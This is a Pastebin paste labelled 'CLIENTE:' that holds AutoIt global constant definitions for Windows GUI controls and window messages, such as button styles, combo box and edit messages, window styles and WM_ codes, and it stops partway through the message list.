Advertisement
Guest User

Untitled

a guest
Jan 21st, 2017
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 58.90 KB | None | 0 0
  1. CLIENTE:
  2.  
  3. Global Const $acs_center = 1
  4. Global Const $acs_transparent = 2
  5. Global Const $acs_autoplay = 4
  6. Global Const $acs_timer = 8
  7. Global Const $acs_nontransparent = 16
  8. Global Const $gui_ss_default_avi = $acs_transparent
  9. Global Const $__aviconstant_wm_user = 1024
  10. Global Const $acm_opena = $__aviconstant_wm_user + 100
  11. Global Const $acm_play = $__aviconstant_wm_user + 101
  12. Global Const $acm_stop = $__aviconstant_wm_user + 102
  13. Global Const $acm_isplaying = $__aviconstant_wm_user + 104
  14. Global Const $acm_openw = $__aviconstant_wm_user + 103
  15. Global Const $acn_start = 1
  16. Global Const $acn_stop = 2
  17. Global Const $bs_groupbox = 7
  18. Global Const $bs_bottom = 2048
  19. Global Const $bs_center = 768
  20. Global Const $bs_defpushbutton = 1
  21. Global Const $bs_left = 256
  22. Global Const $bs_multiline = 8192
  23. Global Const $bs_pushbox = 10
  24. Global Const $bs_pushlike = 4096
  25. Global Const $bs_right = 512
  26. Global Const $bs_rightbutton = 32
  27. Global Const $bs_top = 1024
  28. Global Const $bs_vcenter = 3072
  29. Global Const $bs_flat = 32768
  30. Global Const $bs_icon = 64
  31. Global Const $bs_bitmap = 128
  32. Global Const $bs_notify = 16384
  33. Global Const $bs_splitbutton = 12
  34. Global Const $bs_defsplitbutton = 13
  35. Global Const $bs_commandlink = 14
  36. Global Const $bs_defcommandlink = 15
  37. Global Const $bcsif_glyph = 1
  38. Global Const $bcsif_image = 2
  39. Global Const $bcsif_style = 4
  40. Global Const $bcsif_size = 8
  41. Global Const $bcss_nosplit = 1
  42. Global Const $bcss_stretch = 2
  43. Global Const $bcss_alignleft = 4
  44. Global Const $bcss_image = 8
  45. Global Const $button_imagelist_align_left = 0
  46. Global Const $button_imagelist_align_right = 1
  47. Global Const $button_imagelist_align_top = 2
  48. Global Const $button_imagelist_align_bottom = 3
  49. Global Const $button_imagelist_align_center = 4
  50. Global Const $bs_3state = 5
  51. Global Const $bs_auto3state = 6
  52. Global Const $bs_autocheckbox = 3
  53. Global Const $bs_checkbox = 2
  54. Global Const $bs_radiobutton = 4
  55. Global Const $bs_autoradiobutton = 9
  56. Global Const $bs_ownerdraw = 11
  57. Global Const $gui_ss_default_button = 0
  58. Global Const $gui_ss_default_checkbox = 0
  59. Global Const $gui_ss_default_group = 0
  60. Global Const $gui_ss_default_radio = 0
  61. Global Const $bcm_first = 5632
  62. Global Const $bcm_getidealsize = ($bcm_first + 1)
  63. Global Const $bcm_getimagelist = ($bcm_first + 3)
  64. Global Const $bcm_getnote = ($bcm_first + 10)
  65. Global Const $bcm_getnotelength = ($bcm_first + 11)
  66. Global Const $bcm_getsplitinfo = ($bcm_first + 8)
  67. Global Const $bcm_gettextmargin = ($bcm_first + 5)
  68. Global Const $bcm_setdropdownstate = ($bcm_first + 6)
  69. Global Const $bcm_setimagelist = ($bcm_first + 2)
  70. Global Const $bcm_setnote = ($bcm_first + 9)
  71. Global Const $bcm_setshield = ($bcm_first + 12)
  72. Global Const $bcm_setsplitinfo = ($bcm_first + 7)
  73. Global Const $bcm_settextmargin = ($bcm_first + 4)
  74. Global Const $bm_click = 245
  75. Global Const $bm_getcheck = 240
  76. Global Const $bm_getimage = 246
  77. Global Const $bm_getstate = 242
  78. Global Const $bm_setcheck = 241
  79. Global Const $bm_setdontclick = 248
  80. Global Const $bm_setimage = 247
  81. Global Const $bm_setstate = 243
  82. Global Const $bm_setstyle = 244
  83. Global Const $bcn_first = -1250
  84. Global Const $bcn_dropdown = ($bcn_first + 2)
  85. Global Const $bcn_hotitemchange = ($bcn_first + 1)
  86. Global Const $bn_clicked = 0
  87. Global Const $bn_paint = 1
  88. Global Const $bn_hilite = 2
  89. Global Const $bn_unhilite = 3
  90. Global Const $bn_disable = 4
  91. Global Const $bn_doubleclicked = 5
  92. Global Const $bn_setfocus = 6
  93. Global Const $bn_killfocus = 7
  94. Global Const $bn_pushed = $bn_hilite
  95. Global Const $bn_unpushed = $bn_unhilite
  96. Global Const $bn_dblclk = $bn_doubleclicked
  97. Global Const $bst_checked = 1
  98. Global Const $bst_indeterminate = 2
  99. Global Const $bst_unchecked = 0
  100. Global Const $bst_focus = 8
  101. Global Const $bst_pushed = 4
  102. Global Const $bst_dontclick = 128
  103. Global Const $cb_err = -1
  104. Global Const $cb_errattribute = -3
  105. Global Const $cb_errrequired = -4
  106. Global Const $cb_errspace = -2
  107. Global Const $cb_okay = 0
  108. Global Const $state_system_invisible = 32768
  109. Global Const $state_system_pressed = 8
  110. Global Const $cbs_autohscroll = 64
  111. Global Const $cbs_disablenoscroll = 2048
  112. Global Const $cbs_dropdown = 2
  113. Global Const $cbs_dropdownlist = 3
  114. Global Const $cbs_hasstrings = 512
  115. Global Const $cbs_lowercase = 16384
  116. Global Const $cbs_nointegralheight = 1024
  117. Global Const $cbs_oemconvert = 128
  118. Global Const $cbs_ownerdrawfixed = 16
  119. Global Const $cbs_ownerdrawvariable = 32
  120. Global Const $cbs_simple = 1
  121. Global Const $cbs_sort = 256
  122. Global Const $cbs_uppercase = 8192
  123. Global Const $cbm_first = 5888
  124. Global Const $cb_addstring = 323
  125. Global Const $cb_deletestring = 324
  126. Global Const $cb_dir = 325
  127. Global Const $cb_findstring = 332
  128. Global Const $cb_findstringexact = 344
  129. Global Const $cb_getcomboboxinfo = 356
  130. Global Const $cb_getcount = 326
  131. Global Const $cb_getcuebanner = ($cbm_first + 4)
  132. Global Const $cb_getcursel = 327
  133. Global Const $cb_getdroppedcontrolrect = 338
  134. Global Const $cb_getdroppedstate = 343
  135. Global Const $cb_getdroppedwidth = 351
  136. Global Const $cb_geteditsel = 320
  137. Global Const $cb_getextendedui = 342
  138. Global Const $cb_gethorizontalextent = 349
  139. Global Const $cb_getitemdata = 336
  140. Global Const $cb_getitemheight = 340
  141. Global Const $cb_getlbtext = 328
  142. Global Const $cb_getlbtextlen = 329
  143. Global Const $cb_getlocale = 346
  144. Global Const $cb_getminvisible = 5890
  145. Global Const $cb_gettopindex = 347
  146. Global Const $cb_initstorage = 353
  147. Global Const $cb_limittext = 321
  148. Global Const $cb_resetcontent = 331
  149. Global Const $cb_insertstring = 330
  150. Global Const $cb_selectstring = 333
  151. Global Const $cb_setcuebanner = ($cbm_first + 3)
  152. Global Const $cb_setcursel = 334
  153. Global Const $cb_setdroppedwidth = 352
  154. Global Const $cb_seteditsel = 322
  155. Global Const $cb_setextendedui = 341
  156. Global Const $cb_sethorizontalextent = 350
  157. Global Const $cb_setitemdata = 337
  158. Global Const $cb_setitemheight = 339
  159. Global Const $cb_setlocale = 345
  160. Global Const $cb_setminvisible = 5889
  161. Global Const $cb_settopindex = 348
  162. Global Const $cb_showdropdown = 335
  163. Global Const $cbn_closeup = 8
  164. Global Const $cbn_dblclk = 2
  165. Global Const $cbn_dropdown = 7
  166. Global Const $cbn_editchange = 5
  167. Global Const $cbn_editupdate = 6
  168. Global Const $cbn_errspace = (-1)
  169. Global Const $cbn_killfocus = 4
  170. Global Const $cbn_selchange = 1
  171. Global Const $cbn_selendcancel = 10
  172. Global Const $cbn_selendok = 9
  173. Global Const $cbn_setfocus = 3
  174. Global Const $cbes_ex_casesensitive = 16
  175. Global Const $cbes_ex_noeditimage = 1
  176. Global Const $cbes_ex_noeditimageindent = 2
  177. Global Const $cbes_ex_nosizelimit = 8
  178. Global Const $__comboboxconstant_wm_user = 1024
  179. Global Const $cbem_deleteitem = $cb_deletestring
  180. Global Const $cbem_getcombocontrol = ($__comboboxconstant_wm_user + 6)
  181. Global Const $cbem_geteditcontrol = ($__comboboxconstant_wm_user + 7)
  182. Global Const $cbem_getexstyle = ($__comboboxconstant_wm_user + 9)
  183. Global Const $cbem_getextendedstyle = ($__comboboxconstant_wm_user + 9)
  184. Global Const $cbem_getimagelist = ($__comboboxconstant_wm_user + 3)
  185. Global Const $cbem_getitema = ($__comboboxconstant_wm_user + 4)
  186. Global Const $cbem_getitemw = ($__comboboxconstant_wm_user + 13)
  187. Global Const $cbem_getunicodeformat = 8192 + 6
  188. Global Const $cbem_haseditchanged = ($__comboboxconstant_wm_user + 10)
  189. Global Const $cbem_insertitema = ($__comboboxconstant_wm_user + 1)
  190. Global Const $cbem_insertitemw = ($__comboboxconstant_wm_user + 11)
  191. Global Const $cbem_setexstyle = ($__comboboxconstant_wm_user + 8)
  192. Global Const $cbem_setextendedstyle = ($__comboboxconstant_wm_user + 14)
  193. Global Const $cbem_setimagelist = ($__comboboxconstant_wm_user + 2)
  194. Global Const $cbem_setitema = ($__comboboxconstant_wm_user + 5)
  195. Global Const $cbem_setitemw = ($__comboboxconstant_wm_user + 12)
  196. Global Const $cbem_setunicodeformat = 8192 + 5
  197. Global Const $cbem_setwindowtheme = 8192 + 11
  198. Global Const $cben_first = (-800)
  199. Global Const $cben_last = (-830)
  200. Global Const $cben_beginedit = ($cben_first - 4)
  201. Global Const $cben_deleteitem = ($cben_first - 2)
  202. Global Const $cben_dragbegina = ($cben_first - 8)
  203. Global Const $cben_dragbeginw = ($cben_first - 9)
  204. Global Const $cben_endedita = ($cben_first - 5)
  205. Global Const $cben_endeditw = ($cben_first - 6)
  206. Global Const $cben_getdispinfo = ($cben_first + 0)
  207. Global Const $cben_getdispinfoa = ($cben_first + 0)
  208. Global Const $cben_getdispinfow = ($cben_first - 7)
  209. Global Const $cben_insertitem = ($cben_first - 1)
  210. Global Const $cbeif_di_setitem = 268435456
  211. Global Const $cbeif_image = 2
  212. Global Const $cbeif_indent = 16
  213. Global Const $cbeif_lparam = 32
  214. Global Const $cbeif_overlay = 8
  215. Global Const $cbeif_selectedimage = 4
  216. Global Const $cbeif_text = 1
  217. Global Const $gui_ss_default_combo = 2097218
  218. Global Const $es_left = 0
  219. Global Const $es_center = 1
  220. Global Const $es_right = 2
  221. Global Const $es_multiline = 4
  222. Global Const $es_uppercase = 8
  223. Global Const $es_lowercase = 16
  224. Global Const $es_password = 32
  225. Global Const $es_autovscroll = 64
  226. Global Const $es_autohscroll = 128
  227. Global Const $es_nohidesel = 256
  228. Global Const $es_oemconvert = 1024
  229. Global Const $es_readonly = 2048
  230. Global Const $es_wantreturn = 4096
  231. Global Const $es_number = 8192
  232. Global Const $ec_err = -1
  233. Global Const $ecm_first = 5376
  234. Global Const $em_canundo = 198
  235. Global Const $em_charfrompos = 215
  236. Global Const $em_emptyundobuffer = 205
  237. Global Const $em_fmtlines = 200
  238. Global Const $em_getcuebanner = ($ecm_first + 2)
  239. Global Const $em_getfirstvisibleline = 206
  240. Global Const $em_gethandle = 189
  241. Global Const $em_getimestatus = 217
  242. Global Const $em_getlimittext = 213
  243. Global Const $em_getline = 196
  244. Global Const $em_getlinecount = 186
  245. Global Const $em_getmargins = 212
  246. Global Const $em_getmodify = 184
  247. Global Const $em_getpasswordchar = 210
  248. Global Const $em_getrect = 178
  249. Global Const $em_getsel = 176
  250. Global Const $em_getthumb = 190
  251. Global Const $em_getwordbreakproc = 209
  252. Global Const $em_hideballoontip = ($ecm_first + 4)
  253. Global Const $em_limittext = 197
  254. Global Const $em_linefromchar = 201
  255. Global Const $em_lineindex = 187
  256. Global Const $em_linelength = 193
  257. Global Const $em_linescroll = 182
  258. Global Const $em_posfromchar = 214
  259. Global Const $em_replacesel = 194
  260. Global Const $em_scroll = 181
  261. Global Const $em_scrollcaret = 183
  262. Global Const $em_setcuebanner = ($ecm_first + 1)
  263. Global Const $em_sethandle = 188
  264. Global Const $em_setimestatus = 216
  265. Global Const $em_setlimittext = $em_limittext
  266. Global Const $em_setmargins = 211
  267. Global Const $em_setmodify = 185
  268. Global Const $em_setpasswordchar = 204
  269. Global Const $em_setreadonly = 207
  270. Global Const $em_setrect = 179
  271. Global Const $em_setrectnp = 180
  272. Global Const $em_setsel = 177
  273. Global Const $em_settabstops = 203
  274. Global Const $em_setwordbreakproc = 208
  275. Global Const $em_showballoontip = ($ecm_first + 3)
  276. Global Const $em_undo = 199
  277. Global Const $ec_leftmargin = 1
  278. Global Const $ec_rightmargin = 2
  279. Global Const $ec_usefontinfo = 65535
  280. Global Const $emsis_compositionstring = 1
  281. Global Const $eimes_getcompstratonce = 1
  282. Global Const $eimes_cancelcompstrinfocus = 2
  283. Global Const $eimes_completecompstrkillfocus = 4
  284. Global Const $en_align_ltr_ec = 1792
  285. Global Const $en_align_rtl_ec = 1793
  286. Global Const $en_change = 768
  287. Global Const $en_errspace = 1280
  288. Global Const $en_hscroll = 1537
  289. Global Const $en_killfocus = 512
  290. Global Const $en_maxtext = 1281
  291. Global Const $en_setfocus = 256
  292. Global Const $en_update = 1024
  293. Global Const $en_vscroll = 1538
  294. Global Const $gui_ss_default_edit = 3150016
  295. Global Const $gui_ss_default_input = 128
  296. Global Const $gui_event_close = -3
  297. Global Const $gui_event_minimize = -4
  298. Global Const $gui_event_restore = -5
  299. Global Const $gui_event_maximize = -6
  300. Global Const $gui_event_primarydown = -7
  301. Global Const $gui_event_primaryup = -8
  302. Global Const $gui_event_secondarydown = -9
  303. Global Const $gui_event_secondaryup = -10
  304. Global Const $gui_event_mousemove = -11
  305. Global Const $gui_event_resized = -12
  306. Global Const $gui_event_dropped = -13
  307. Global Const $gui_rundefmsg = "GUI_RUNDEFMSG"
  308. Global Const $gui_avistop = 0
  309. Global Const $gui_avistart = 1
  310. Global Const $gui_aviclose = 2
  311. Global Const $gui_checked = 1
  312. Global Const $gui_indeterminate = 2
  313. Global Const $gui_unchecked = 4
  314. Global Const $gui_dropaccepted = 8
  315. Global Const $gui_nodropaccepted = 4096
  316. Global Const $gui_acceptfiles = $gui_dropaccepted
  317. Global Const $gui_show = 16
  318. Global Const $gui_hide = 32
  319. Global Const $gui_enable = 64
  320. Global Const $gui_disable = 128
  321. Global Const $gui_focus = 256
  322. Global Const $gui_nofocus = 8192
  323. Global Const $gui_defbutton = 512
  324. Global Const $gui_expand = 1024
  325. Global Const $gui_ontop = 2048
  326. Global Const $gui_fontitalic = 2
  327. Global Const $gui_fontunder = 4
  328. Global Const $gui_fontstrike = 8
  329. Global Const $gui_dockauto = 1
  330. Global Const $gui_dockleft = 2
  331. Global Const $gui_dockright = 4
  332. Global Const $gui_dockhcenter = 8
  333. Global Const $gui_docktop = 32
  334. Global Const $gui_dockbottom = 64
  335. Global Const $gui_dockvcenter = 128
  336. Global Const $gui_dockwidth = 256
  337. Global Const $gui_dockheight = 512
  338. Global Const $gui_docksize = 768
  339. Global Const $gui_dockmenubar = 544
  340. Global Const $gui_dockstatebar = 576
  341. Global Const $gui_dockall = 802
  342. Global Const $gui_dockborders = 102
  343. Global Const $gui_gr_close = 1
  344. Global Const $gui_gr_line = 2
  345. Global Const $gui_gr_bezier = 4
  346. Global Const $gui_gr_move = 6
  347. Global Const $gui_gr_color = 8
  348. Global Const $gui_gr_rect = 10
  349. Global Const $gui_gr_ellipse = 12
  350. Global Const $gui_gr_pie = 14
  351. Global Const $gui_gr_dot = 16
  352. Global Const $gui_gr_pixel = 18
  353. Global Const $gui_gr_hint = 20
  354. Global Const $gui_gr_refresh = 22
  355. Global Const $gui_gr_pensize = 24
  356. Global Const $gui_gr_nobkcolor = -2
  357. Global Const $gui_bkcolor_default = -1
  358. Global Const $gui_bkcolor_transparent = -2
  359. Global Const $gui_bkcolor_lv_alternate = -33554432
  360. Global Const $gui_ws_ex_parentdrag = 1048576
  361. Global Const $pbs_marquee = 8
  362. Global Const $pbs_smooth = 1
  363. Global Const $pbs_smoothreverse = 16
  364. Global Const $pbs_vertical = 4
  365. Global Const $gui_ss_default_progress = 0
  366. Global Const $__progressbarconstant_wm_user = 1024
  367. Global Const $pbm_deltapos = $__progressbarconstant_wm_user + 3
  368. Global Const $pbm_getbarcolor = 1039
  369. Global Const $pbm_getbkcolor = 1038
  370. Global Const $pbm_getpos = $__progressbarconstant_wm_user + 8
  371. Global Const $pbm_getrange = $__progressbarconstant_wm_user + 7
  372. Global Const $pbm_getstate = 1041
  373. Global Const $pbm_getstep = 1037
  374. Global Const $pbm_setbarcolor = $__progressbarconstant_wm_user + 9
  375. Global Const $pbm_setbkcolor = 8192 + 1
  376. Global Const $pbm_setmarquee = $__progressbarconstant_wm_user + 10
  377. Global Const $pbm_setpos = $__progressbarconstant_wm_user + 2
  378. Global Const $pbm_setrange = $__progressbarconstant_wm_user + 1
  379. Global Const $pbm_setrange32 = $__progressbarconstant_wm_user + 6
  380. Global Const $pbm_setstate = 1040
  381. Global Const $pbm_setstep = $__progressbarconstant_wm_user + 4
  382. Global Const $pbm_stepit = $__progressbarconstant_wm_user + 5
  383. Global Const $tbcd_channel = 3
  384. Global Const $tbcd_thumb = 2
  385. Global Const $tbcd_tics = 1
  386. Global Const $__sliderconstant_wm_user = 1024
  387. Global Const $tbm_clearsel = $__sliderconstant_wm_user + 19
  388. Global Const $tbm_cleartics = $__sliderconstant_wm_user + 9
  389. Global Const $tbm_getbuddy = $__sliderconstant_wm_user + 33
  390. Global Const $tbm_getchannelrect = $__sliderconstant_wm_user + 26
  391. Global Const $tbm_getlinesize = $__sliderconstant_wm_user + 24
  392. Global Const $tbm_getnumtics = $__sliderconstant_wm_user + 16
  393. Global Const $tbm_getpagesize = $__sliderconstant_wm_user + 22
  394. Global Const $tbm_getpos = $__sliderconstant_wm_user
  395. Global Const $tbm_getptics = $__sliderconstant_wm_user + 14
  396. Global Const $tbm_getselend = $__sliderconstant_wm_user + 18
  397. Global Const $tbm_getselstart = $__sliderconstant_wm_user + 17
  398. Global Const $tbm_getrangemax = $__sliderconstant_wm_user + 2
  399. Global Const $tbm_getrangemin = $__sliderconstant_wm_user + 1
  400. Global Const $tbm_getthumblength = $__sliderconstant_wm_user + 28
  401. Global Const $tbm_getthumbrect = $__sliderconstant_wm_user + 25
  402. Global Const $tbm_gettic = $__sliderconstant_wm_user + 3
  403. Global Const $tbm_getticpos = $__sliderconstant_wm_user + 15
  404. Global Const $tbm_gettooltips = $__sliderconstant_wm_user + 30
  405. Global Const $tbm_getunicodeformat = 8192 + 6
  406. Global Const $tbm_setbuddy = $__sliderconstant_wm_user + 32
  407. Global Const $tbm_setlinesize = $__sliderconstant_wm_user + 23
  408. Global Const $tbm_setpagesize = $__sliderconstant_wm_user + 21
  409. Global Const $tbm_setpos = $__sliderconstant_wm_user + 5
  410. Global Const $tbm_setrange = $__sliderconstant_wm_user + 6
  411. Global Const $tbm_setrangemax = $__sliderconstant_wm_user + 8
  412. Global Const $tbm_setrangemin = $__sliderconstant_wm_user + 7
  413. Global Const $tbm_setsel = $__sliderconstant_wm_user + 10
  414. Global Const $tbm_setselend = $__sliderconstant_wm_user + 12
  415. Global Const $tbm_setselstart = $__sliderconstant_wm_user + 11
  416. Global Const $tbm_setthumblength = $__sliderconstant_wm_user + 27
  417. Global Const $tbm_settic = $__sliderconstant_wm_user + 4
  418. Global Const $tbm_setticfreq = $__sliderconstant_wm_user + 20
  419. Global Const $tbm_settipside = $__sliderconstant_wm_user + 31
  420. Global Const $tbm_settooltips = $__sliderconstant_wm_user + 29
  421. Global Const $tbm_setunicodeformat = 8192 + 5
  422. Global Const $tbts_bottom = 2
  423. Global Const $tbts_left = 1
  424. Global Const $tbts_right = 3
  425. Global Const $tbts_top = 0
  426. Global Const $tbs_autoticks = 1
  427. Global Const $tbs_both = 8
  428. Global Const $tbs_bottom = 0
  429. Global Const $tbs_downisleft = 1024
  430. Global Const $tbs_enableselrange = 32
  431. Global Const $tbs_fixedlength = 64
  432. Global Const $tbs_horz = 0
  433. Global Const $tbs_left = 4
  434. Global Const $tbs_nothumb = 128
  435. Global Const $tbs_noticks = 16
  436. Global Const $tbs_reversed = 512
  437. Global Const $tbs_right = 0
  438. Global Const $tbs_top = 4
  439. Global Const $tbs_tooltips = 256
  440. Global Const $tbs_vert = 2
  441. Global Const $gui_ss_default_slider = $tbs_autoticks
  442. Global Const $ss_left = 0
  443. Global Const $ss_center = 1
  444. Global Const $ss_right = 2
  445. Global Const $ss_icon = 3
  446. Global Const $ss_blackrect = 4
  447. Global Const $ss_grayrect = 5
  448. Global Const $ss_whiterect = 6
  449. Global Const $ss_blackframe = 7
  450. Global Const $ss_grayframe = 8
  451. Global Const $ss_whiteframe = 9
  452. Global Const $ss_simple = 11
  453. Global Const $ss_leftnowordwrap = 12
  454. Global Const $ss_bitmap = 14
  455. Global Const $ss_etchedhorz = 16
  456. Global Const $ss_etchedvert = 17
  457. Global Const $ss_etchedframe = 18
  458. Global Const $ss_noprefix = 128
  459. Global Const $ss_notify = 256
  460. Global Const $ss_centerimage = 512
  461. Global Const $ss_rightjust = 1024
  462. Global Const $ss_sunken = 4096
  463. Global Const $gui_ss_default_label = 0
  464. Global Const $gui_ss_default_graphic = 0
  465. Global Const $gui_ss_default_icon = $ss_notify
  466. Global Const $gui_ss_default_pic = $ss_notify
  467. Global Const $wc_animate = "SysAnimate32"
  468. Global Const $wc_button = "Button"
  469. Global Const $wc_combobox = "ComboBox"
  470. Global Const $wc_comboboxex = "ComboBoxEx32"
  471. Global Const $wc_datetimepick = "SysDateTimePick32"
  472. Global Const $wc_edit = "Edit"
  473. Global Const $wc_header = "SysHeader32"
  474. Global Const $wc_hotkey = "msctls_hotkey32"
  475. Global Const $wc_ipaddress = "SysIPAddress32"
  476. Global Const $wc_link = "SysLink"
  477. Global Const $wc_listbox = "ListBox"
  478. Global Const $wc_listview = "SysListView32"
  479. Global Const $wc_monthcal = "SysMonthCal32"
  480. Global Const $wc_nativefontctl = "NativeFontCtl"
  481. Global Const $wc_pagescroller = "SysPager"
  482. Global Const $wc_progress = "msctls_progress32"
  483. Global Const $wc_rebar = "ReBarWindow32"
  484. Global Const $wc_scrollbar = "ScrollBar"
  485. Global Const $wc_static = "Static"
  486. Global Const $wc_statusbar = "msctls_statusbar32"
  487. Global Const $wc_tabcontrol = "SysTabControl32"
  488. Global Const $wc_toolbar = "ToolbarWindow32"
  489. Global Const $wc_tooltips = "tooltips_class32"
  490. Global Const $wc_trackbar = "msctls_trackbar32"
  491. Global Const $wc_treeview = "SysTreeView32"
  492. Global Const $wc_updown = "msctls_updown32"
  493. Global Const $ws_overlapped = 0
  494. Global Const $ws_tiled = $ws_overlapped
  495. Global Const $ws_maximizebox = 65536
  496. Global Const $ws_minimizebox = 131072
  497. Global Const $ws_tabstop = 65536
  498. Global Const $ws_group = 131072
  499. Global Const $ws_sizebox = 262144
  500. Global Const $ws_thickframe = $ws_sizebox
  501. Global Const $ws_sysmenu = 524288
  502. Global Const $ws_hscroll = 1048576
  503. Global Const $ws_vscroll = 2097152
  504. Global Const $ws_dlgframe = 4194304
  505. Global Const $ws_border = 8388608
  506. Global Const $ws_caption = 12582912
  507. Global Const $ws_overlappedwindow = BitOR($ws_caption, $ws_maximizebox, $ws_minimizebox, $ws_overlapped, $ws_sysmenu, $ws_thickframe)
  508. Global Const $ws_tiledwindow = $ws_overlappedwindow
  509. Global Const $ws_maximize = 16777216
  510. Global Const $ws_clipchildren = 33554432
  511. Global Const $ws_clipsiblings = 67108864
  512. Global Const $ws_disabled = 134217728
  513. Global Const $ws_visible = 268435456
  514. Global Const $ws_minimize = 536870912
  515. Global Const $ws_iconic = $ws_minimize
  516. Global Const $ws_child = 1073741824
  517. Global Const $ws_childwindow = $ws_child
  518. Global Const $ws_popup = -2147483648
  519. Global Const $ws_popupwindow = -2138570752
  520. Global Const $ds_3dlook = 4
  521. Global Const $ds_absalign = 1
  522. Global Const $ds_center = 2048
  523. Global Const $ds_centermouse = 4096
  524. Global Const $ds_contexthelp = 8192
  525. Global Const $ds_control = 1024
  526. Global Const $ds_fixedsys = 8
  527. Global Const $ds_localedit = 32
  528. Global Const $ds_modalframe = 128
  529. Global Const $ds_nofailcreate = 16
  530. Global Const $ds_noidlemsg = 256
  531. Global Const $ds_setfont = 64
  532. Global Const $ds_setforeground = 512
  533. Global Const $ds_shellfont = BitOR($ds_fixedsys, $ds_setfont)
  534. Global Const $ds_sysmodal = 2
  535. Global Const $ws_ex_acceptfiles = 16
  536. Global Const $ws_ex_appwindow = 262144
  537. Global Const $ws_ex_composited = 33554432
  538. Global Const $ws_ex_controlparent = 65536
  539. Global Const $ws_ex_clientedge = 512
  540. Global Const $ws_ex_contexthelp = 1024
  541. Global Const $ws_ex_dlgmodalframe = 1
  542. Global Const $ws_ex_layered = 524288
  543. Global Const $ws_ex_layoutrtl = 4194304
  544. Global Const $ws_ex_left = 0
  545. Global Const $ws_ex_leftscrollbar = 16384
  546. Global Const $ws_ex_ltrreading = 0
  547. Global Const $ws_ex_mdichild = 64
  548. Global Const $ws_ex_noactivate = 134217728
  549. Global Const $ws_ex_noinheritlayout = 1048576
  550. Global Const $ws_ex_noparentnotify = 4
  551. Global Const $ws_ex_right = 4096
  552. Global Const $ws_ex_rightscrollbar = 0
  553. Global Const $ws_ex_rtlreading = 8192
  554. Global Const $ws_ex_staticedge = 131072
  555. Global Const $ws_ex_toolwindow = 128
  556. Global Const $ws_ex_topmost = 8
  557. Global Const $ws_ex_transparent = 32
  558. Global Const $ws_ex_windowedge = 256
  559. Global Const $ws_ex_overlappedwindow = BitOR($ws_ex_clientedge, $ws_ex_windowedge)
  560. Global Const $ws_ex_palettewindow = BitOR($ws_ex_toolwindow, $ws_ex_topmost, $ws_ex_windowedge)
  561. Global Const $wm_null = 0
  562. Global Const $wm_create = 1
  563. Global Const $wm_destroy = 2
  564. Global Const $wm_move = 3
  565. Global Const $wm_sizewait = 4
  566. Global Const $wm_size = 5
  567. Global Const $wm_activate = 6
  568. Global Const $wm_setfocus = 7
  569. Global Const $wm_killfocus = 8
  570. Global Const $wm_setvisible = 9
  571. Global Const $wm_enable = 10
  572. Global Const $wm_setredraw = 11
  573. Global Const $wm_settext = 12
  574. Global Const $wm_gettext = 13
  575. Global Const $wm_gettextlength = 14
  576. Global Const $wm_paint = 15
  577. Global Const $wm_close = 16
  578. Global Const $wm_queryendsession = 17
  579. Global Const $wm_quit = 18
  580. Global Const $wm_erasebkgnd = 20
  581. Global Const $wm_queryopen = 19
  582. Global Const $wm_syscolorchange = 21
  583. Global Const $wm_endsession = 22
  584. Global Const $wm_systemerror = 23
  585. Global Const $wm_showwindow = 24
  586. Global Const $wm_ctlcolor = 25
  587. Global Const $wm_settingchange = 26
  588. Global Const $wm_wininichange = 26
  589. Global Const $wm_devmodechange = 27
  590. Global Const $wm_activateapp = 28
  591. Global Const $wm_fontchange = 29
  592. Global Const $wm_timechange = 30
  593. Global Const $wm_cancelmode = 31
  594. Global Const $wm_setcursor = 32
  595. Global Const $wm_mouseactivate = 33
  596. Global Const $wm_childactivate = 34
  597. Global Const $wm_queuesync = 35
  598. Global Const $wm_getminmaxinfo = 36
  599. Global Const $wm_logoff = 37
  600. Global Const $wm_painticon = 38
  601. Global Const $wm_iconerasebkgnd = 39
  602. Global Const $wm_nextdlgctl = 40
  603. Global Const $wm_alttabactive = 41
  604. Global Const $wm_spoolerstatus = 42
  605. Global Const $wm_drawitem = 43
  606. Global Const $wm_measureitem = 44
  607. Global Const $wm_deleteitem = 45
  608. Global Const $wm_vkeytoitem = 46
  609. Global Const $wm_chartoitem = 47
  610. Global Const $wm_setfont = 48
  611. Global Const $wm_getfont = 49
  612. Global Const $wm_sethotkey = 50
  613. Global Const $wm_gethotkey = 51
  614. Global Const $wm_filesyschange = 52
  615. Global Const $wm_isactiveicon = 53
  616. Global Const $wm_queryparkicon = 54
  617. Global Const $wm_querydragicon = 55
  618. Global Const $wm_winhelp = 56
  619. Global Const $wm_compareitem = 57
  620. Global Const $wm_fullscreen = 58
  621. Global Const $wm_clientshutdown = 59
  622. Global Const $wm_ddemlevent = 60
  623. Global Const $wm_getobject = 61
  624. Global Const $wm_calcscroll = 63
  625. Global Const $wm_testing = 64
  626. Global Const $wm_compacting = 65
  627. Global Const $wm_otherwindowcreated = 66
  628. Global Const $wm_otherwindowdestroyed = 67
  629. Global Const $wm_commnotify = 68
  630. Global Const $wm_mediastatuschange = 69
  631. Global Const $wm_windowposchanging = 70
  632. Global Const $wm_windowposchanged = 71
  633. Global Const $wm_power = 72
  634. Global Const $wm_copyglobaldata = 73
  635. Global Const $wm_copydata = 74
  636. Global Const $wm_canceljournal = 75
  637. Global Const $wm_logonnotify = 76
  638. Global Const $wm_keyf1 = 77
  639. Global Const $wm_notify = 78
  640. Global Const $wm_access_window = 79
  641. Global Const $wm_inputlangchangerequest = 80
  642. Global Const $wm_inputlangchange = 81
  643. Global Const $wm_tcard = 82
  644. Global Const $wm_help = 83
  645. Global Const $wm_userchanged = 84
  646. Global Const $wm_notifyformat = 85
  647. Global Const $wm_qm_activate = 96
  648. Global Const $wm_hook_do_callback = 97
  649. Global Const $wm_syscopydata = 98
  650. Global Const $wm_finaldestroy = 112
  651. Global Const $wm_measureitem_clientdata = 113
  652. Global Const $wm_contextmenu = 123
  653. Global Const $wm_stylechanging = 124
  654. Global Const $wm_stylechanged = 125
  655. Global Const $wm_displaychange = 126
  656. Global Const $wm_geticon = 127
  657. Global Const $wm_seticon = 128
  658. Global Const $wm_nccreate = 129
  659. Global Const $wm_ncdestroy = 130
  660. Global Const $wm_nccalcsize = 131
  661. Global Const $wm_nchittest = 132
  662. Global Const $wm_ncpaint = 133
  663. Global Const $wm_ncactivate = 134
  664. Global Const $wm_getdlgcode = 135
  665. Global Const $wm_syncpaint = 136
  666. Global Const $wm_synctask = 137
  667. Global Const $wm_kludgeminrect = 139
  668. Global Const $wm_lpkdrawswitchwnd = 140
  669. Global Const $wm_uahdestroywindow = 144
  670. Global Const $wm_uahdrawmenu = 145
